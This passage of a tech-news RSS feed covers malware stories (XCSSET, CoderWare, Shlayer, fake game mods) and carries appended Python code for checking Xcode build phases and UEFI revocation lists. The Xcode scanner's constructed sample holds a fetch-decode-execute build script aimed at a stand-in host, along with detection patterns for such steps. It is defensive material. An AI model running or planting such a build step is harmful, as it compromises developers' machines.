for.</p><p>Concerning MoonBounce, Kaspersky seems pretty certain that this malware is the product of APT41, "a threat actor that&apos;s been widely reported to be Chinese-speaking." In this case, the smoking gun is a "unique certificate" that the FBI has previously reported as signaling the use of APT41-owned infrastructure. APT41 has a history of supply chain attacks, so this is a continuation of a central thread of APT41&apos;s nefarious operations.</p><h2 id="safety-measures">Safety Measures</h2><p>To help avoid falling victim to MoonBounce or similar UEFI malware, Kaspersky suggests a number of measures. It recommends that users keep their UEFI firmware updated directly from the manufacturer, verify that BootGuard is enabled where available, and enable Trusted Platform Modules. Last but not least, it recommends a security solution that scans system firmware for issues so that measures can be taken when UEFI malware is detected.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Malware Attacks From Fake PC Games Numbered Over 5.8 Million in Past Year  ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/malware-attacks-from-fake-pc-games-numbered-over-58-million-in-past-year</link>
                                                                            <description>
                            <![CDATA[ Kaspersky reported that the number of malware and unwanted software posing as popular PC games surpassed 5.8 million from Q3 2020 to Q2 2021. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">R6FTe4u2YtBGpKNUKMGgK7</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/deBvya9TiFwXffnH6dNeR9-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 31 Aug 2021 17:57:57 +0000</pubDate>                                                                                                                                <updated>Wed, 05 Feb 2025 14:37:44 +0000</updated>
                                                                                                                                            <category><![CDATA[PC Gaming]]></category>
                                                    <category><![CDATA[Video Games]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Aaron Klotz) ]]></author>                    <dc:creator><![CDATA[ Aaron Klotz ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aAk2saHqkgFuTCanz8LnmD.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/deBvya9TiFwXffnH6dNeR9-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[hacker]]></media:description>                                                            <media:text><![CDATA[hacker]]></media:text>
                                <media:title type="plain"><![CDATA[hacker]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/deBvya9TiFwXffnH6dNeR9-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1000px;"><p class="vanilla-image-block" style="padding-top:49.70%;"><img id="" name="shutterstock_1198180480.jpg" alt="hacker" src="https://cdn.mos.cms.futurecdn.net/deBvya9TiFwXffnH6dNeR9.jpg" mos="" align="middle" fullscreen="" width="1000" height="497" attribution="" endorsement="" class=""></p></div></div><figcaption itemprop="caption description" class=" inline-layout"><span class="credit" itemprop="copyrightHolder">(Image credit: Shutterstock)</span></figcaption></figure><p>There&apos;s no doubt that the pandemic gave gaming a popularity boost over the past year, but that&apos;s also been accompanied by a boost in cyberattacks on gamers. Kaspersky reported this month that the number of malware and unwanted software posing as popular PC games that it detected (and prevented) surpassed 5.8 million from Q3 2020 to Q2 2021. </p><p>Kaspersky examined attacks pretending to be the 24 most popular PC games and found 2.48 million detections globally when pandemic-related lockdowns hit in Q2 2020. That&apos;s a 66% increase compared to Q1 2020. We&apos;d expect even higher numbers if Kaspersky expanded its detection range. Kaspersky said the "increased volume may be connected to the rapid growth of gaming activities during the pandemic." 
</p><p>Out of the 24 PC titles Kaspersky listed, the top five games most often used to disguise malware were: <em>Minecraft, The Sims 4, PUBG, Fortnite </em>and <em>Grand Theft Auto V </em>(<em>GTA V</em>), with <em>Minecraft </em>far and away leading the pack.</p><div ><table><caption>Q3 2020 - Q2 2021</caption><thead><tr><th class="firstcol " >Game Title</th><th  >Users</th><th  >Detections</th><th  >Files</th></tr></thead><tbody><tr><td class="firstcol " >Minecraft</td><td  >184,887</td><td  >3,010,891</td><td  >36,336</td></tr><tr><td class="firstcol " >The Sims 4</td><td  >43,252</td><td  >1,266,804</td><td  >5,844</td></tr><tr><td class="firstcol " >PUBG</td><td  >26,724</td><td  >484,528</td><td  >10,360</td></tr><tr><td class="firstcol " >Fortnite</td><td  >14,702</td><td  >267,598</td><td  >6,109</td></tr><tr><td class="firstcol " >Grand Theft Auto V</td><td  >14,261</td><td  >187,114</td><td  >4,953</td></tr></tbody></table></div><p>These results aren’t too surprising, since <em>Minecraft, Sims </em>and <em>GTA V </em>are especially known for their modding communities. Mods are rarely distributed through a single trusted location and are usually spread across many sites. This gives cybercriminals an easy way to disguise malware as game mods, especially to unwary eyes.</p><p>The best way to ensure the security of game mods is to know exactly where a mod came from and which platform distributed it. Downloading torrent files from an unknown source is an easy way to get attacked.</p><p>Thankfully, things seem to be getting better in 2021. In Q2 2021, Kaspersky logged only 636,904 detections of such attacks, compared to the 2.48 million recorded in Q2 2020. Kaspersky didn&apos;t specify why. We suspect it&apos;s because PC gamers are moving on to other activities as the pandemic eases. 
Or, perhaps, PC gamers have become incredibly smart...one can hope.</p><h2 id="mobile-gamers-also-targeted">Mobile Gamers Also Targeted</h2><p>Kaspersky also looked at the 10 most popular mobile games and reported that the number of affected mobile gamers grew by 185% from February 2020 to 3,253 mobile gamers in March 2020. </p><p>On top of that, even though lockdowns have eased, cyberattacks on mobile gamers have continued as people keep playing on their phones. </p><p>"Furthermore, the number of users striving to unwind on mobile phones did not drop significantly after the two waves of the pandemic, showing on average just a 10% drop in users attacked per month in Q2 2020 versus Q2 2021. This showed that mobile threats remained attractive to cybercriminals even as lockdowns were being lifted across the world," Kaspersky said. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Crypto-Stealing Malware Starts Targeting Apple's M1 Macs ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/xcsset-malware-targets-m1-macs-xcode</link>
                                                                            <description>
                            <![CDATA[ Researchers have discovered that the XCSSET malware has started targeting M1-equipped Macs via the Xcode dev tool. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">AeW8XRDicwxm98ooCq4ALJ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/VH6EJ8bSYgBCbUYB7ViQ9D-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 20 Apr 2021 13:58:04 +0000</pubDate>                                                                                                                                <updated>Wed, 05 Feb 2025 14:19:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hEFeUwJHtzVDWEZTcjDqt9.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/VH6EJ8bSYgBCbUYB7ViQ9D-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Apple M1]]></media:description>                                                            <media:text><![CDATA[Apple M1]]></media:text>
                                <media:title type="plain"><![CDATA[Apple M1]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/VH6EJ8bSYgBCbUYB7ViQ9D-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Researchers have discovered that the XCSSET malware has started targeting M1-equipped Macs via Xcode, The Hacker News <a href="https://thehackernews.com/2021/04/malware-spreads-via-xcode-projects-now.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Cyber+Security+Blog%29">reported</a> Monday, and that it has been updated to compromise accounts on various cryptocurrency trading platforms.</p><p>Xcode is the integrated development environment (IDE) used to make apps for the iPhone, iPad, and other Apple hardware. Even if a cross-platform framework is used to develop a particular app, it must pass through Xcode to reach those platforms.</p><p>That means XCSSET is limiting itself to technically savvy people who, if we had to guess, would be more likely to own cryptocurrency than the average Mac owner. Targeted attacks like this are often more successful than broader ones.</p><p>Kaspersky warned that XCSSET <a href="https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/">had been updated</a> for Apple&apos;s custom silicon in March. The malware wasn&apos;t focused on cryptocurrency at the time, the security company said. 
Instead, it featured a variety of modules that were designed to:</p><ul><li>Reading and dumping Safari cookies</li><li>Injecting malicious JavaScript code into various websites</li><li>Stealing user files and information from applications, such as Notes, WeChat, Skype, Telegram, etc.</li><li>Encrypting user files</li></ul><p>Trend Micro then <a href="https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html">warned</a> on April 16 that XCSSET had been updated to bypass security features introduced with macOS Big Sur, change the icons it uses to match system icons, and attempt to gain access to victims&apos; accounts on crypto platforms.</p><p>The company&apos;s advice was clear: "To protect systems from this type of threat, users should only download apps from official and legitimate marketplaces," it said. But that&apos;s hard to do when it comes to finding Xcode projects to work with or learn from.</p><p>XCSSET&apos;s expansion to cryptocurrency makes sense. The <a href="https://www.tomshardware.com/news/bitcoin-value-soars-as-coinbase-hits-nasdaq">value of Bitcoin</a>, Ethereum, and even Dogecoin has <a href="https://www.tomshardware.com/news/woof-dogecoin-cryptocurrency-returns-are-up-6000-this-year">continued to rise</a> in recent months, and stealing coins from someone else is probably requires fewer resources than mining them would.</p><p>Adding support for Apple&apos;s custom silicon was also prudent. Devices featuring <a href="https://www.tomshardware.com/news/Apple-M1-Chip-Everything-We-Know">the M1 chip</a> have been <a href="https://www.tomshardware.com/reviews/macbook-pro-m1-13-inch-2020">well-reviewed</a>, and with Apple&apos;s plan to <a href="https://www.tomshardware.com/news/apple-arm-mac-announcement-M1">ditch Intel entirely</a> by the end of 2022, it makes sense to start targeting its chips now.</p><p>Other malware creators appear to agree. 
We saw reports of <a href="https://www.tomshardware.com/news/malware-creators-start-targeting-apple-m1">the first malware</a> targeting Apple silicon in February, and in March, <a href="https://www.tomshardware.com/news/mysterious-silver-sparrow-malware-targets-macs">the Silver Sparrow malware</a> was discovered on approximately 30,000 macOS devices, some of which had M1 chips.</p>
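<p>A practical check for the Xcode-project risk described above, as an added example that is not part of the original article or of any vendor&apos;s tooling: before opening a project cloned from an untrusted repository, list its run-script build phases and flag the ones that fetch, decode or execute content at build time, since a build phase runs with the developer&apos;s privileges the moment the project is built. The assumption that project-borne malware rides in a <code>PBXShellScriptBuildPhase</code> is the author&apos;s, not something the article states; the <code>project.pbxproj</code> fragment, the indicator list and the hostname below are constructed for this example.</p>

```python
import re
import sys

# Constructed project.pbxproj fragment (not from any real project): one benign
# run-script phase and one that downloads, decodes and executes a remote blob,
# then strips the quarantine flag from what it dropped. The hostname is fake.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		A1B2C3D4 /* SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = SwiftLint;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		E5F6A7B8 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "curl -fsSL \"http://update.example.invalid/x\" | base64 -D | sh\nxattr -d com.apple.quarantine ~/Library/Caches/x\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# One object block of the old-style plist: "<hex id> /* label */ = { ... };"
BLOCK_RE = re.compile(
    r'(?P<id>[0-9A-F]{8,24}) /\* (?P<label>.*?) \*/ = \{(?P<body>.*?)\n\s*\};', re.S)
# The quoted shellScript value; backslash escapes (\" and \n) are part of the token.
SCRIPT_RE = re.compile(r'shellScript = "((?:\\.|[^"\\])*)";', re.S)

# Hypothetical review heuristics: (pattern, why a reviewer should look at the phase).
INDICATORS = [
    (r'\b(curl|wget)\b', 'downloads content from the network at build time'),
    (r'\bbase64\b.*\s(-D|-d|--decode)\b', 'decodes a base64 blob'),
    (r'\|\s*(sh|bash|zsh|python3?|perl|osascript)\b', 'pipes data into an interpreter'),
    (r'\beval\b', 'evaluates a dynamically built command'),
    (r'\bxattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine', 'strips the Gatekeeper quarantine flag'),
    (r'LaunchAgents|launchctl\s+(load|bootstrap)', 'installs a launch agent (persistence)'),
]


def unescape_pbx(value: str) -> str:
    """Undo the pbxproj string escapes so the script reads as it will actually run."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)),
                  value, flags=re.S)


def scan_pbxproj(text: str) -> list:
    """Return one finding per run-script build phase whose script matches any indicator."""
    findings = []
    for block in BLOCK_RE.finditer(text):
        body = block.group('body')
        if 'isa = PBXShellScriptBuildPhase;' not in body:
            continue
        match = SCRIPT_RE.search(body)
        script = unescape_pbx(match.group(1)) if match else ''
        reasons = [why for pattern, why in INDICATORS if re.search(pattern, script)]
        if reasons:
            findings.append({'phase': block.group('label'), 'script': script, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for finding in scan_pbxproj(source):
        print('suspicious build phase %r:' % finding['phase'])
        for reason in finding['reasons']:
            print('  - ' + reason)
        print('  script: ' + finding['script'].strip().replace('\n', ' ; '))
```

<p>Pointing the script at a real project (<code>python3 scan_pbxproj.py MyApp.xcodeproj/project.pbxproj</code>) prints each suspicious phase with the reasons it tripped. A hit is a reason to read the script before building, not proof of compromise: plenty of legitimate projects run curl or a shell pipeline in a build phase, which is exactly why this vector is attractive.</p>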
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware Disguised as Mobile Version of Cyberpunk 2077 ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/cyberpunk-2077-mobile-ransomware</link>
                                                                            <description>
                            <![CDATA[ A fake Google Play website is distributing ransomware disguised as a mobile version of Cyberpunk 2077 and will infect your device when installed. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">fMJdbWJCZhGziichDACoZC</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/bLjfSrh9MLcZmv7m8TbHG3-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 21 Dec 2020 14:23:31 +0000</pubDate>                                                                                                                                <updated>Thu, 21 Aug 2025 09:48:12 +0000</updated>
                                                                                                                                            <category><![CDATA[Video Games]]></category>
                                                                                                                    <dc:creator><![CDATA[ Keith Mitchell ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/tJ8GZHxH4zV84wfi7jyx65.png ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/bLjfSrh9MLcZmv7m8TbHG3-1280-80.jpg">
                                                            <media:credit><![CDATA[CD Projekt Red]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Cyberpunk 2077 screen shots and image quality comparisons]]></media:description>                                                            <media:text><![CDATA[Cyberpunk 2077 screen shots and image quality comparisons]]></media:text>
                                <media:title type="plain"><![CDATA[Cyberpunk 2077 screen shots and image quality comparisons]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/bLjfSrh9MLcZmv7m8TbHG3-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><a href="https://www.tomshardware.com/news/cyberpunk-2077-pc-bug-causes-corruption-in-game-saves-reports">Despite the current state of Cyberpunk 2077</a>, eager fans everywhere are still trying to get as much time with the game as they can. That demand gave someone the opening to build ransomware and disguise it as a mobile version of the game. According to Kaspersky malware analyst <a href="https://twitter.com/sh1shk0va/status/1339399972047994882">Tatyana Shishkova</a>, a fraudulent website has been crafted to look like the Google Play Store and offers a mobile version of Cyberpunk 2077. In reality, the site tricks people into downloading and installing ransomware onto their Android devices.</p><div class="see-more see-more--clipped"><blockquote class="twitter-tweet hawk-ignore" data-lang="en"><p lang="en" dir="ltr">New Android #Ransomware disguised as #Cyberpunk2077 game.<br>Downloaded from fake website imitating Google Play Store.<br>Extension: .coder<br>CryptFamily: CoderWare/BlackKingdom https://t.co/JBudDP6vG1 pic.twitter.com/TdM4SAkFWl<a href="https://twitter.com/sh1shk0va/status/1338999532701577216">December 16, 2020</a></p></blockquote><div class="see-more__filter"></div></div><p>This ransomware has been dubbed CoderWare. Once it infects a device, it encrypts the user&apos;s files and tells the victim they have 10 hours to send $500 in bitcoin to the ransomware creator. Failing to do so, the note claims, will result in the encrypted files being permanently deleted, which only matters if you don&apos;t have a clean backup to restore from.</p><p>Fortunately, not all is lost: the sample turned out to be a variant of the BlackKingdom ransomware that appeared in early 2020. This was pointed out by <a href="https://twitter.com/sh1shk0va/status/1339399972047994882">Tatyana Shishkova</a>, who also provides a way around the ransomware. Unlike BlackKingdom, CoderWare uses a hardcoded encryption key, so a decryptor that embeds the same key can recover the encrypted files without anyone paying the ransom.</p><p>The hardcoded key is visible in the malware&apos;s decompiled source code, as seen in the screenshot below.</p><figure class="van-image-figure " data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1409px;"><p class="vanilla-image-block" style="padding-top:66.78%;"><img id="" name="Cyberpunk 2077 Ransomware Coderware Source Code.jpg" alt="Cyberpunk 2077 Ransomware Coderware Source Code" src="https://cdn.mos.cms.futurecdn.net/HGSx68ZCeoBjkJaTv7mTJA.jpg" mos="" align="middle" fullscreen="" width="1409" height="941" attribution="" endorsement="" class=""></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Kaspersky)</span></figcaption></figure><p>Of course, the best way to protect your mobile device is to not download and install unofficial software on it. There is no mobile version of Cyberpunk 2077, nor has one been announced. The only platforms the game runs on are PlayStation 4, PlayStation 5, Xbox One, Xbox Series X|S, PC, and Stadia. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Blames Microsoft For Buggy Windows 10 Patch ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-blames-microsoft-for-buggy-windows-10-patch</link>
                                                                            <description>
                            <![CDATA[ Kaspersky Labs blamed Microsoft for the latest Windows 10 update breaking features on users' systems, after Microsoft revoked vulnerable UEFI signatures and forgot to tell Kaspersky about it. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">v2fjSGEWTSYUe7V8fvqS6M</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/C25TDecMZxYhLgJtaTJuuP-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 19 Feb 2020 17:26:17 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/C25TDecMZxYhLgJtaTJuuP-1280-80.jpg">
                                                            <media:credit><![CDATA[Microsoft]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Microsoft]]></media:description>                                                            <media:text><![CDATA[Microsoft]]></media:text>
                                <media:title type="plain"><![CDATA[Microsoft]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/C25TDecMZxYhLgJtaTJuuP-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Kaspersky has <a href="https://www.kaspersky.com/blog/microsoft-kb4524244-issues-faq/32488/">put the blame squarely on Microsoft</a> after a recent Windows 10 security update (<a href="https://support.microsoft.com/en-us/help/4524244/security-update-for-windows-10-february-11-2020" target="_blank">KB4524244</a>) caused system crashes and broken features on some machines. The update was meant to protect against an attack that abused a vulnerable version of the Kaspersky Rescue Disk software, a vulnerability the security company says it had already patched in August 2019.</p><p>Microsoft recently had to pull the update after it caused those issues. According to Kaspersky, the update changed the UEFI Secure Boot revocation list (the DBX forbidden-signatures database) to revoke certain UEFI signatures that were being used with older and maliciously modified versions of the Kaspersky Rescue Disk. </p><p>Kaspersky said its current software is not at fault for the incompatibility. Microsoft may well have been right to revoke a signature that attackers were abusing, but the core complaint is that Microsoft didn&apos;t warn Kaspersky in advance, so Kaspersky couldn&apos;t take the steps needed to support the new signature before the revocation landed on users&apos; machines. </p><p>This isn&apos;t the first time Kaspersky and other companies have <a href="https://www.tomshardware.com/news/kaspersky-antitrust-microsoft-european-union,34676.html" target="_blank">accused Microsoft</a> of not communicating well enough about changes that affect third-party developers, which often results in software conflicts and system crashes for users. Microsoft may also get little sympathy from users, considering how many issues its updates have caused over the past year or so.</p><p>According to Kaspersky, if the update hasn&apos;t caused you any problems, you don&apos;t need to remove it. Microsoft has said the update won&apos;t be re-issued and that fixes for the new bugs are coming.</p>
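<p>The mechanism at the centre of this dispute, as an added example that is not code from Microsoft, Kaspersky or the original article: Secure Boot revocations are delivered as EFI_SIGNATURE_LIST structures appended to the firmware&apos;s forbidden-signature database (DBX), so an administrator can check whether a particular boot loader&apos;s hash has been revoked by parsing that variable. The parser below follows the EFI_SIGNATURE_LIST layout from the UEFI specification; the DBX blob it runs on is constructed inline from made-up hashes rather than read from firmware, and the variable path and PowerShell cmdlet in the comments are the usual ones, not taken from the article.</p>

```python
import hashlib
import struct
import uuid

# EFI_SIGNATURE_LIST (UEFI spec, Secure Boot variables):
#   EFI_GUID SignatureType; UINT32 SignatureListSize; UINT32 SignatureHeaderSize;
#   UINT32 SignatureSize; then SignatureHeader[], then SignatureSize-byte entries,
#   each an EFI_GUID SignatureOwner followed by the signature data.
HEADER = struct.Struct('<16sIII')
EFI_CERT_SHA256_GUID = uuid.UUID('c1c41626-504c-4092-aca9-41f936934328')  # 32-byte PE hash entries
EFI_CERT_X509_GUID = uuid.UUID('a5c059a1-94e4-4aa7-87b5-ab155c2bf072')    # DER certificate entries


def parse_signature_lists(blob: bytes):
    """Yield (signature_type, owner, data) for every entry in a db/dbx variable blob."""
    off = 0
    while off < len(blob):
        if off + HEADER.size > len(blob):
            raise ValueError('truncated EFI_SIGNATURE_LIST header at offset %d' % off)
        raw_type, list_size, hdr_size, sig_size = HEADER.unpack_from(blob, off)
        if list_size < HEADER.size + hdr_size or off + list_size > len(blob) or sig_size < 16:
            raise ValueError('corrupt EFI_SIGNATURE_LIST at offset %d' % off)
        sig_type = uuid.UUID(bytes_le=raw_type)       # GUIDs are stored mixed-endian
        pos, end = off + HEADER.size + hdr_size, off + list_size
        while pos + sig_size <= end:
            owner = uuid.UUID(bytes_le=blob[pos:pos + 16])
            yield sig_type, owner, blob[pos + 16:pos + sig_size]
            pos += sig_size
        off = end


def revoked_sha256_hashes(blob: bytes) -> set:
    """Authenticode SHA-256 image hashes revoked by this DBX, as lowercase hex strings."""
    return {data.hex() for sig_type, _, data in parse_signature_lists(blob)
            if sig_type == EFI_CERT_SHA256_GUID and len(data) == 32}


def is_revoked(blob: bytes, authenticode_sha256_hex: str) -> bool:
    """True if the given PE image hash appears in the DBX blob."""
    return authenticode_sha256_hex.lower() in revoked_sha256_hashes(blob)


def build_sha256_list(hashes, owner=uuid.UUID(int=0)) -> bytes:
    """Serialise one EFI_SIGNATURE_LIST of SHA-256 entries (used here to build the sample)."""
    entries = b''.join(owner.bytes_le + h for h in hashes)
    return HEADER.pack(EFI_CERT_SHA256_GUID.bytes_le, HEADER.size + len(entries), 0, 16 + 32) + entries


# Constructed sample: three made-up "revoked boot loader" hashes across two lists,
# mimicking a DBX that has received more than one update over time.
SAMPLE_HASHES = [hashlib.sha256(b'constructed revoked image %d' % i).digest() for i in range(3)]
SAMPLE_DBX = build_sha256_list(SAMPLE_HASHES[:2]) + build_sha256_list(SAMPLE_HASHES[2:])


def load_live_dbx(path='/sys/firmware/efi/efivars/dbx-d719b2cb-3d3a-4596-a3bc-dad00e67656f') -> bytes:
    """Read the live DBX on Linux; efivarfs prefixes the data with 4 bytes of attributes.
    The Windows equivalent is (Get-SecureBootUEFI -Name dbx).Bytes in PowerShell."""
    with open(path, 'rb') as f:
        return f.read()[4:]


if __name__ == '__main__':
    print('%d SHA-256 revocations in sample DBX' % len(revoked_sha256_hashes(SAMPLE_DBX)))
    print('sample hash 0 revoked:', is_revoked(SAMPLE_DBX, SAMPLE_HASHES[0].hex()))
    print('unknown hash revoked:', is_revoked(SAMPLE_DBX, '00' * 32))
```

<p>The hash to look up is the Authenticode hash of the PE image (what tools such as sigcheck or pesign report), not the SHA-256 of the file&apos;s raw bytes, because the firmware hashes the image the way the PE signing format does. A DBX can also carry whole X.509 certificates, which the parser yields under EFI_CERT_X509_GUID; checking those means matching the issuing certificate of a signed loader rather than its hash.</p>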
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky: Fake Flash Updates Are Macs' Biggest Malware Threat ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/shlayer-fake-flash-updates-macos-apple</link>
                                                                            <description>
                            <![CDATA[ A Kaspersky report said that Shlayer, malware pretending to be a Flash update on streaming sites, is the most common malware on Apple macOS. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">UPevBrwm8atBoPepgB5MZ3</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/xMJGNpY2Zkr4P68X6z9snM-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Fri, 24 Jan 2020 19:13:49 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/xMJGNpY2Zkr4P68X6z9snM-1280-80.png">
                                                            <media:credit><![CDATA[Kaspersky Labs]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Shlayer malware]]></media:description>                                                            <media:text><![CDATA[Shlayer malware]]></media:text>
                                <media:title type="plain"><![CDATA[Shlayer malware]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/xMJGNpY2Zkr4P68X6z9snM-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure " data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:983px;"><p class="vanilla-image-block" style="padding-top:60.12%;"><img id="" name="shlayer-for-macos-20.png" alt="Shlayer malware" src="https://cdn.mos.cms.futurecdn.net/xMJGNpY2Zkr4P68X6z9snM.png" mos="" align="middle" fullscreen="1" width="983" height="591" attribution="" endorsement="" class="expandable"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Kaspersky Labs)</span></figcaption></figure><p>According to <a href="https://securelist.com/shlayer-for-macos/95724/" target="_blank">Kaspersky Labs</a> research shared this week, one in 10 of the macOS users of its products has encountered the Shlayer malware. It typically arrives as a fake Flash Player update pushed by websites offering pirated TV shows and live sports streams. By number of detections, Shlayer is reportedly the most common piece of malware on macOS right now.</p><h2 id="most-common-malware-on-macos">Most Common Malware on macOS</h2><p>If Shlayer is so widespread on macOS, a platform that used to be thought of as &apos;virus-free&apos; (more a consequence of its small user base than anything else), surely it must be very advanced malware that keeps outsmarting both Apple and users, right? Not so. </p><p>The malware simply tricks users into thinking it is an update for the Flash software needed to play a video. Shlayer usually comes embedded in pages offering pirated shows and live sports feeds, which tell the visitor to install the fake Flash update before the video will stream. It is one of the most common malware lures we have seen on Windows, too.</p><p>The malware primarily hits the U.S. (31% of detections), Germany (14%), France (10%) and the UK (10%). </p><p>Kaspersky&apos;s blog post said Shlayer is by far the most common malware family hitting macOS systems, accounting for 30% of all detections for the OS. Since 2018, when the company first identified it, it has collected almost 30,000 samples of the trojan and identified 143 command and control (C&C) server domains. </p><p>How did Shlayer spread so quickly? Its creators appear to have gone with a bold promotion: paying the owners of video streaming sites that push the installer a high commission per install. According to Kaspersky, the fee is significantly higher than what other malware families with similar monetization strategies pay.</p><p>The latest distribution trick is to take over expired domains that are still linked from popular pages on sites like YouTube and Wikipedia, so that old, once-legitimate links now lead to the fake update. </p><p>The next version of Safari will end support for the real Flash Player for good, as will all the other major browsers, including Chrome and Firefox. This kind of social engineering shouldn&apos;t work once people know Flash no longer runs in their browser. Still, the malware will likely keep tricking users for years, as not everyone stays abreast of the latest Flash news.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky: DarkUniverse Hacking Group Was Spear Phishing Stealthily for 8 years ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/darkuniverse-advanced-persistent-threat-atp-group-spearphishing</link>
                                                                            <description>
                            <![CDATA[ Kaspersky uncovered a new advanced persistent threat group, DarkUniverse, that had been operating in the dark for eight years. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">sQPyoEwzfKGjxcCXsFb3mB</guid>
